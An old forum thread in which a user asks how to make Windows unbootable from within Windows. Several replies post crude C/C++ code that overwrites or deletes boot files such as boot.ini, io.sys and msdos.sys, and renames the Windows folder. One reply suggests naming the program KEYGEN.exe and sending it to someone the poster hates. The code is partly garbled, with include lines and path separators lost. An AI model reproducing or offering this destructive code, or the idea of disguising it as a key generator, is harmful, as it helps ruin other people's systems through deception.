• 0

erase windows mbr


Question

14 answers to this question

Recommended Posts

  • 0

Why would you want to stop Windows from loading. Do you mean by default or do you mean ever. It would seem that if you wanted to prevent it from ever being loaded again, then it occurs to me that sort of thing could be used as a virus of some sort. Perhaps I'm just paranoid... hey, stop looking at me.:paranoid:

Link to comment
https://www.neowin.net/forum/topic/15221-erase-windows-mbr/#findComment-123920
Share on other sites

  • 0
I need to know if it is possible to erase a windows mbr, so you can't boot into windows. It has to be done from within windows.

Virus? Well, anyways, You can't edit partitions, format windows drive, or edit mbr in windows. You must do it from DOS or another OS. Easiest way to delete it is to format the partition.

Link to comment
https://www.neowin.net/forum/topic/15221-erase-windows-mbr/#findComment-123929
Share on other sites

  • 0
Originally posted by Goalie_CA  

 

Virus? Well, anyways, You can't edit partitions, format windows drive, or edit mbr in windows. You must do it from DOS or another OS. Easiest way to delete it is to format the partition.

I didn't mean a virus exactly, but if there were an easy way to delete the mbr in windows, it could possibly create a bit of havoc if someone unknowingly were to run a piece of code that did that. To tell you the truth, I don't really know what I am talking about, but I'm off my medication and I feel lonely.:D :D :D

Link to comment
https://www.neowin.net/forum/topic/15221-erase-windows-mbr/#findComment-123931
Share on other sites

  • 0

C++, here ill pseudo code it for ya...



int main.. bla bla bla

{

outfileor something ("C:Windowswin.ini");

[color=red]---(If it is a win98 or below pc or this depends on all the boot files)[/color]

// -or-

outfile("C:config.sys")

[color=red]---(another one depending on the OS)[/color]



//then over write all or some of the system filles needed for boot

}



[/PHP]

or just use this snippit, its in a forever loop and will also fill the hdd...

[PHP]

#include

#include



int main()

{

ofstream outFile ("C:boot.ini");



cout << "Debug Message: Overwriting of critical system files have commenced";



while(1)

outFile << "USELESS JUNK IS THE BESTEST CRAP EVER!!!! /t/t";



cout << "Debug Message: You will never see this but when you restart, you are screwed.";



return 0;

}

[/PHP]

and to think that i am a mediocre compsci student.. bah, i rather learn asembly and write virii anywayz :evil: :evil: :evil:

[[ EDIT: i forgot to mention that this is in win32 text conole.. ]]

[[ EDIT AGAIN: USE THIS AT YOUR OWN RISK. I AM NOT AT ALL RESPONSIBLE IF YOU HAVE A LIFELONG SUBSCRIPTION TO NOSE BOOGER BI-MONTHY AFTER THE USE OF THIS CODE. ]]

Link to comment
https://www.neowin.net/forum/topic/15221-erase-windows-mbr/#findComment-123968
Share on other sites

  • 0

YOU WILL NEED TO REINSTALL YOUR OS IF YOU RUN THIS!!!!!!

I am not responsible if this eats your dog or steals your girlfriend.

#include //good ol' C

int main(){

remove ("c:/boot.ini"); //notice its not c: its c:/ because of escape chars!!!

remove ("c:/config.sys");

remove ("c:/io.sys");

remove ("c:/msdos.sys");

rename("c:/windows","c:/VIRUS"); //Will rename windows dir, won't boot!!!

//put whatever files you want!!!!

return 0;

};

Link to comment
https://www.neowin.net/forum/topic/15221-erase-windows-mbr/#findComment-123987
Share on other sites

  • 0

I know the file protection protests average joe from deleting files but how low-level does the protection go??? Is it written into the NTFS file system. Does it have an attribute???

ps: MINE IS THE BEST!!!!

pps: Rename the app to KEYGEN.exe and send it to some1 you hate!!!

Link to comment
https://www.neowin.net/forum/topic/15221-erase-windows-mbr/#findComment-123994
Share on other sites

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • My Photos app is version 2026.11050.1001.0 and it remembers the window size and position. My Snipping Tool is version 11.2602.49.0 and it can capture the taskbar.
    • MusicBee 3.6.9668 by Razvan Serea MusicBee is an application geared toward managing extensive music collections, easy to use and with a comprehensive feature set. It makes it easy to organize, find, and play music files on your computer, on portable devices, and on the Web. It provides playback of a wide range of audio formats, smart playlists with the ability to discover and play new music from the web, advanced tag editing with automated artwork and tag look up, folder monitoring, automated file re-organization, portable device synchronization, and secure CD ripping with AccurateRip verification. MusicBee features: Supported formats: MP3, AAC, M4A, MPC, OGG, FLAC, APE, TAK, WV, WMA and WAV. Audio CDs: Audio CD playback and ripping (with CD-Text capabilities) is supported. CD tracks can be ripped (in fast or secure mode) as individual files or as a single album with embedded cuesheet. Conversion: Conversion from and to all supported formats as metadata are preserved. Synchronization of tags only (in case that the output file already exists) instead of reencoding is possible. ReplayGain support: both playback and calculation. File Organization: Organization and renaming of music files into folders and files based on tag values such as artist, album, name, track number, etc. that can be specified. MusicBee can do this automatically for all files in a music library or the user can choose the files or folders themselves. Web Browsing: Browsing of the web using Mozilla's XULRunner environment. Scrobbling: Tracks played from MusicBee can optionally be scrobbled to Last.fm. Customizable user interface layout. Customizable keyboard shortcuts. MiniLyrics support Download: MusicBee 3.6.9668 | MusicBee Portable | ~9.0 MB (Freeware) Download: Windows Store Edition View: MusicBee Home page | Release Notes | Screenshot Get alerted to all of our Software updates on Twitter at @NeowinSoftware
    • On xiaomi hyperos there's also an option to disable google assistant. I've got everything disabled. Only thing I do have installed is a web wrapped for duck.ai which claims to let you use various AIs anonymously
    • I need to understand the rationale of not shipping all of these K2 improvements in a single update/release. It's giving "we will fix Windows 11 but no commitments". It seems to me that they just announce these improvements just to appease the community.
    • The term "RTM" is long gone starting with Windows 10. Every current release is a GA build. This is the result of MS making Windows as a Service (WaaS).
  • Recent Achievements

    • Conversation Starter
      sumytbe earned a badge
      Conversation Starter
    • One Year In
      B4dM1k3 earned a badge
      One Year In
    • One Year In
      DarkWun earned a badge
      One Year In
    • Dedicated
      Almohandis earned a badge
      Dedicated
    • Dedicated
      JuvenileDelinquent earned a badge
      Dedicated
  • Popular Contributors

    1. 1
      +primortal
      520
    2. 2
      +Edouard
      185
    3. 3
      PsYcHoKiLLa
      87
    4. 4
      Michael Scrip
      81
    5. 5
      Steven P.
      73
  • Tell a friend

    Love Neowin? Tell a friend!